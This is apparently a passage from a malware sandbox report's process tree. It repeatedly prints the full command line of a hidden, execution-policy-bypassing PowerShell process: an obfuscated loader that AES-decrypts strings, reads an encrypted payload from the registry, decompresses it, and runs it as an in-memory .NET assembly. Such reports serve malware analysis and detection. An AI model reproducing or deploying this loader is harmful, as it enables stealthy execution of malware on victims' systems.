[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        11⤵
        Executes dropped EXE
        
        PID:7020
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(7152).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        11⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:3304
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(7152).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        11⤵
        Executes dropped EXE
        
        PID:5264
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(7152).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        11⤵
        Executes dropped EXE
        
        PID:7160
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(7152).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join 